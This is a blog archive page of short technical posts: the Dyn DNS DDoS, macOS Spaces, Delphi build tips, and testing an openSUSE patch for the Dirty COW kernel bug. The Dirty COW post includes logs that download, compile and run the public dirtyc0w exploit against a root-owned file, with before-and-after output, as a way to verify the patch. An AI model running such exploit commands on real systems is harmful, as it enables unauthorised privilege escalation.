The Wiert Corner – irregular stream of stuff

Jeroen W. Pluimers on .NET, C#, Delphi, databases, and personal interests

  • My badges

    Mastodon

  • Twitter Updates

  • My Flickr Stream

    20140508-Delphi-2007--Project-Options--Cannot-Edit-Application-Title-HelpFile-Icon-Theming20140430-Fiddler-Filter-Actions-Button-Run-Filterset-now20140424-VMware-Fusion-6.0.3.-no-reclaimable
    More Photos

  • Pages

  • All categories

  • Enter your email address to subscribe to this blog and receive notifications of new posts by email.

    Join 1,860 other subscribers

Archive for October, 2016

« Previous Entries
Next Entries »

The IoT strikes back again: half a million IoT devices killed DYN DNS for hours, but fixing this will be hard

Posted by jpluimers on 2016/10/22

Less than a month after The IoT strikes back: 650 Gigabit/second and 1 Terabit/second attacks by IoT devices within a week the IoT struck back again: an estimated half a million IoT devices was used to perform multiple DDoS attacks against Dyn Managed DNS that took around 11 hours to resolve.

Google DNS appears to

Google DNS appears to “live” near me in Amsterdam

High availability usually involves a mix of DNS TTL and/or BGP routing. That’s typically how CDN providers like Cloudflare work (it’s one of the reasons that global DNS servers like Google’s 8.8.8.8 appear near to you and over time routes – some MPLS – to it change). Short DNS TTL can help CDN, requires a very stable DNS infrastructure and is similar to but different fromFast Flux network.

Last months attacks were on a security researcher and a single ISP. The Dyn DNS attack affected even more internet services (not just sites like Twitter, WhatsApp, AirBnB and Github). So I’m with Bruce Schneier that Someone Is Learning How to Take Down the Internet.

Handling these attacks is hard as the DDoS mitigation firms simply cannot handle the sudden increase of attack sizes yet. BCP38 should be part of mitigation, but the puzzle is big and fixing it won’t be easy though root-causes of bugs change as a lot of research is in progress.

I’m not alone in expecting it to get worse though before getting better.

On the client side, I learned that many users could cope by changing their DNS servers to either of these Public DNS Servers:

  • OpenDNS 208.67.222.222, 208.67.220.220, 208.67.222.220, 208.67.220.222
    • OpenDNS does a good job of handing “last known good” IPs when they can’t resolve.
  • Google Public DNS 8.8.8.8, 8.8.4.4
  • Level 3 DNS 4.2.2.1, 4.2.2.2, 4.2.2.3, 4.2.2.4, 4.2.2.5, 4.2.2.6

Some more interesting tidbits on the progress and mitigation on this particular attack are the over time heat-maps of affected regions and BGP routing changes below.

Read the rest of this entry »

Posted in CDN (Content Delivery Network), Cloud, Cloudflare, DNS, Hardware, Infrastructure, Internet, IoT Internet of Things, Network-and-equipment, Opinions, Power User | Leave a Comment »

display – How can I move spaces between external monitors in Mavericks? – Ask Different

Posted by jpluimers on 2016/10/21

display – How can I move spaces between external monitors in Mavericks? – Ask Different [WayBack]

You can only move spaces which are non-active.

For example, lets say you have spaces 1 and 2. If space 1 is active, you can not move it. You first have to select space 2 then you can move space 1 to a different monitor.

This helped me work around version 8.35 of Microsoft Remote Desktop for OS X breaks second monitor usage [WayBack]:

  1. Double click a connection so it goes to a new space on the primary display
  2. Make the normal space active (by three finger swiping on the primary display)
  3. Go to mission control
  4. Move the non-active RDP space to the secondary monitor

Sometimes the primary monitor doesn’t have a non-active space any more so you have to create a new one in the top right of Mission Control [WayBack].

–jeroen

Posted in Apple, Mac, Mac OS X / OS X / MacOS, MacBook, MacBook Retina, MacBook-Pro, OS X 10.9 Mavericks, Power User, Remote Desktop Protocol/MSTSC/Terminal Services, Windows | Leave a Comment »

How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ]

Posted by jpluimers on 2016/10/21

There is a nasty (Dirty COW: CVE-2016-5195) Linux kernel bug with zero-day exploits floating around

OpenSuSE updates will be available soon (likely this weekend); from the  #openSUSE-factory IRC channel :

wiert: any E.T.A. for CVE-2016-5195 in the various releases?

_Marcus_: 13.1 and 42.1 i just released. 13.2 submission i am still awaiting, so release likely tomorrow

wiert: How about Tumbleweed?

DimStar: for TW, I have it in staging and will try to squeeze it into the 1021 snapshot
so unlike something really bad happened, it should be shipping tomorrow or Sunday

via: How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ] [WayBack]

Progress can be tracked at https://bugzilla.suse.com/show_bug.cgi?id=CVE-2016-5195 (via simotek a.k.a. Simon Lees at IRC). Hopefully 13.2 will get released on Monday.

Edit: 13.2 didn’t make it on monday. Progress can be found via https://build.opensuse.org/project/maintenance_incidents/openSUSE:Maintenance (slow loading page!) and is at https://build.opensuse.org/project/show/openSUSE:Maintenance:5752

More exploits at https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

–jeroen

Testing 13.2:

# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
# zypper patch

This works fine in await of the formal update process and me testing it resulted in the release of the kernel to the official 13.2 update, but note you still have to reboot after the update even though the process doesn’t tell you that:

wiert: @_Marcus_ “klopt als een zwerende vinger” or in English: works splendid. install and test log at https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e
wiert: @_Marcus_ thanks about teaching me about `zypper patch`. Need to run for the fundraising event now.
_Marcus_: wiert: thanks :)
wiert: @_Marcus_ no problem. Given the work you guys (and gals?) do it’s a small thing with the added bonus of contributing to my motto “life is about learning new things every day”.
_Marcus_: after your feedback i have now released the kenel ;)
wiert: @_Marcus_ great, looking forward to the actual update later. Thanks a lot!
wiert: @_Marcus_ I’ve updated the gist: 13.2 plus official dirty-COW update needs reboot, but the update process doesn’t list about reboot. Didn’t get the full zypper output, but I after updating I did a before/after reboot comparison of the behaviour. Results in https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e#file-testing-official-update-before-reboot-then-reboot-retest-txt


# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
Adding repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' ……………………………………………………………………………………………………………………………………………………………………………..[done]
Repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' successfully added
Enabled : Yes
Autorefresh : No
GPG Check : Yes
URI : http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/
# zypper patch
New repository or package signing key received:
Repository: openSUSE:Maintenance:5752 (openSUSE_13.2_Update)
Key Name: openSUSE:Maintenance OBS Project <openSUSE:Maintenance@build.opensuse.org>
Key Fingerprint: 7C097045 B0D351D3 69AC453A 598D0E63 B3FD7E48
Key Created: Thu Aug 6 11:49:53 2015
Key Expires: Sat Oct 14 11:49:53 2017
Rpm Name: gpg-pubkey-b3fd7e48-55c32dc1
Do you want to reject the key, trust temporarily, or trust always? [r/t/a/? shows all options] (r): t
Building repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' cache ………………………………………………………………………………………………………………………………………………………………………[done]
Loading repository data…
Reading installed packages…
Resolving package dependencies…
The following NEW package is going to be installed:
kernel-default-3.16.7-45.1
The following NEW patch is going to be installed:
5752
1 new package to install.
Overall download size: 45.2 MiB. Already cached: 0 B After the operation, additional 213.5 MiB will be used.
Continue? [y/n/? shows all options] (y): y
Retrieving package kernel-default-3.16.7-45.1.x86_64 (1/1), 45.2 MiB (213.5 MiB unpacked)
Retrieving: kernel-default-3.16.7-45.1.x86_64.rpm ……………………………………………………………………………………………………………………………………………………………………………………[done (3.6 MiB/s)]
Checking for file conflicts: …………………………………………………………………………………………………………………………………………………………………………………………………………………[done]
(1/1) Installing: kernel-default-3.16.7-45.1 …………………………………………………………………………………………………………………………………………………………………………………………………..[done]
Additional rpm output:
warning: /var/cache/zypp/packages/openSUSE_Maintenance_5752/x86_64/kernel-default-3.16.7-45.1.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID b3fd7e48: NOKEY
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut –logfile /var/log/YaST2/mkinitrd.log –force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader…
Warning: One of installed patches requires reboot of your machine. Reboot as soon as possible.
# reboot

view raw

installing-patch.txt

hosted with ❤ by GitHub


(1/3) Installing: kernel-default-3.16.7-45.1 ……………………………………………………………………………………………….[done]
Additional rpm output:
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut –logfile /var/log/YaST2/mkinitrd.log –force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader…
(2/3) Installing: ghostscript-9.15-6.1 …………………………………………………………………………………………………….[done]
(3/3) Installing: ghostscript-x11-9.15-6.1 …………………………………………………………………………………………………[done]

view raw

tail-log-of-official-update.txt

hosted with ❤ by GitHub


$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su –
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap ffffffffffffffff
madvise -100000000
procselfmem -100000000
$ cat foo
cat: foo: No such file or directory
$ sudo su –
# cat foo
this is not a test
# logout

view raw

testing-after-reboot.txt

hosted with ❤ by GitHub


$ cd /tmp/
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su –
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f6ab7207000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
$ sudo su –
# reboot
login
$ cd /tmp/
$ sudo su –
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f5465983000
madvise 0
procselfmem 1800000000
$ cat foo
this is not a test

view raw

testing-official-update-before-reboot-then-reboot-retest.txt

hosted with ❤ by GitHub

Posted in *nix, openSuSE, Power User, SuSE Linux, Tumbleweed | Leave a Comment »

FileZilla on Windows is waaaay faster than WinSCP

Posted by jpluimers on 2016/10/21

Not sure why yet, but on a gigabit network between a Windows 2008 R2 Server and a Proxmox KVM machine, WinSCP gets around 10 megabit/second and FileZilla > 30 megabit/second.

Others seem to agree that filezilla faster than winscp.

–jeroen

Posted in Communications Development, Development, Internet protocol suite, Power User, Proxmox, SSH, TCP, Virtualization, VMware, Windows, Windows Server 2008, Windows Server 2008 R2 | 1 Comment »

Some Google URLs

Posted by jpluimers on 2016/10/21

Below a table with clickable links, details are in the Via at the end. I added some more beyond the 10 original ones.

# URL What
Footer 1 Footer 2 Footer 3
1 https://accounts.google.com/SignUpWithoutGmail Get a new account
2 https://www.google.com/ads/preferences Manage advertisement profile
3 https://www.google.com/takeout Download your Google data (mail can take days!)
4 https://support.google.com/legal To file a complaint about using copyrighted or unpermissioned material
5 https://maps.google.com/locationhistory Shows where your devices have been
6 https://history.google.com All your searches
7 https://www.google.com/settings/account/inactive Prevent extended inactivity, Google doesn’t delete your account after 9 months.
8 https://security.google.com/settings/security/activity When you suspect account abuse
9 https://security.google.com/settings/security/permissions Set permissions of apps and sites relating to your account
10 https://admin.google.com/example.org/VerifyAdminAccountPasswordReset Apps users: reset admin account by adding a CNAME to the DNS
11 https://plus.google.com G+ / Google Plus
12 https://plus.google.com/hangouts Google Hangouts
13 https://gmail.com GMail / Google Mail
14 https://contacts.google.com Google Contacts (note + button to add is hidden behind Hangouts pop-up also on the lower right)
15 https://calendar.google.com Calendar / Agenda
16 https://www.google.com/sync Sync Google Settings between various devices / applications
17 https://myaccount.google.com Account and privacy settings
18 https://myaccount.google.com/security Security settings like two-factor authentication (2-step signin)
19 https://security.google.com/settings/security/secureaccount Check if your security settings (recovery phone, recovery email, security question) are still up to date.
20 https://myaccount.google.com/privacycheckup/1 Setting your privacy
21 https://wallet.google.com Manage Wallet
22 https://play.google.com Google Play Store and settings
23 https://www.google.com/android/devicemanager Where is your Android device
# href what
# href what
# href what
# href what
# href what
# href what
# href what
# href what
# href what
# href what
# href what

–jeroen

via: Some Imporatant URLs you should know as a Google User – I am Programmer.

Posted in GMail, Google, Power User | Leave a Comment »

Tim Anderson did have Amazon S3 to work from Delphi in 2006

Posted by jpluimers on 2016/10/20

I will probably need this in the future as occasionally I still do Delphi work:

–jeroen

Posted in Delphi, Delphi 2006, Delphi 7, Development, Software Development | 2 Comments »

Merging multiple commands and piping it to one output.

Posted by jpluimers on 2016/10/20

The unix shell is hard, but boy, sometimes it can work like magic, for instance piping two testssl.sh commands into one gist:

retinambpro1tb:testssl.sh jeroenp$ ( ./testssl.sh --version ; ./testssl.sh --local ) | gist -d "testsll version and local ciphers for Mac OS X Darwin binarries supporting zlib"
https://gist.github.com/701496d7fbf929967aa1

The source of this magic was this AskUbuntu answer: How to merge and pipe results from two different commands to single command? – Ask Ubuntu

–jeroen

via: openssl.Darwin.x86_64 lacks zlib support · Issue #164 · drwetter/testssl.sh

Posted in *nix, *nix-tools, bash, bash, Development, Power User, Scripting, Software Development, Uncategorized | Leave a Comment »

Some notes on modifying NIB files on Mac OS X to add/change shortcuts

Posted by jpluimers on 2016/10/19

One of the nitpicks in VMware Fusion is that it has no keyboard shortcut for Resume or Suspend. I was trying to add Command-R and Command-S for those but that didn’t work out.

Since the links below seem to work for some other applications, I’ve kept them:

–jeroen

Posted in Apple, Development, Keyboards and Keyboard Shortcuts, Mac, Mac OS X / OS X / MacOS, MacBook, MacBook Retina, MacBook-Air, MacBook-Pro, MacMini, OS X 10.10 Yosemite, OS X 10.11 El Capitan, OS X 10.9 Mavericks, Power User, Software Development | Leave a Comment »

Loading your MAINICON and VersionInfo through plain text .RC resource files.

Posted by jpluimers on 2016/10/19

I like repositories to have as much of the information in text format.

Delphi traditionally puts both the MAINICON and the VersionInfo resources in a binary .res file and also updates that file on almost every recompile.

There are quite a few posts explaining how to get them from text, but a version controlled example works best for me, so there is one at https://github.com/jpluimers/atom-table-monitor/blob/master/ATOMScannerConsole

The trick is to:

  1. put your resources in a text RC file that can be compiled through a resource compiler
  2. add these to your Delphi project via the project manager, so it generated RcCompile elements which instructs the build process to run the resource compiler first:


<RcCompile Include="MAINICON.rc">
<ModuleName>MAINICON.rc</ModuleName>
<Form>MAINICON.res</Form>
</RcCompile>
<RcCompile Include="VERSIONINFO.rc">
<ModuleName>VERSIONINFO.rc</ModuleName>
<Form>VERSIONINFO.res</Form>
</RcCompile>

view raw

Adding-RC-files-to-project-generates-RcCompile-elements-in-the-dproj-file.txt

hosted with ❤ by GitHub

Here are the example files:

Read the rest of this entry »

Posted in Delphi, Delphi 10 Seattle, Delphi 2007, Delphi 2009, Delphi 2010, Delphi XE, Delphi XE2, Delphi XE3, Delphi XE4, Delphi XE5, Delphi XE6, Delphi XE7, Delphi XE8, Development, QC, Software Development | 2 Comments »

IMPLICITBUILDING in your .dpk files: a Delphi XE2 specific thing

Posted by jpluimers on 2016/10/18

While upgrading a truckload of Delphi stuff for a client, I came across the IMPLICITBUILDING directive in a few .dpk files that Delphi XE2 sometimes inserts but XE8 doesn’t.

This appears to be a Delphi XE2 specific thing that in younger Delphi versions has been solved properly SolarWind‘s answer on Stack Overflow:

 The compiler directives which appear between the $IFDEF IMPLICITBUILDING and $ENDIF are normally passed as parameters by the compiler when explicitly compiling a package. Because these options change based on the configuration (debug / release) and target platform (Win32, Win64, OSX32) it’s problematic to have them statically defined in the package project source. When defined in the project source they will always override the options passed by the compiler. The $IFDEF prevents these options from being used during explicit compilation.

Source: Delphi XE2: What is the purpose of IMPLICITBUILDING directive found in package – Stack Overflow

and comment by Andreas Hausladen:

That seems to be a workaround for the problem that compiling packages with the msbuild script ignored all dproj compiler options because they were read from the dpk file by the compiler.

Some more references (I’ve saved them in the WayBack machine as the forums auto-expire posts):

–jeroen

Posted in Delphi, Delphi XE2, Delphi XE8, Development, Software Development | Leave a Comment »

« Previous Entries
Next Entries »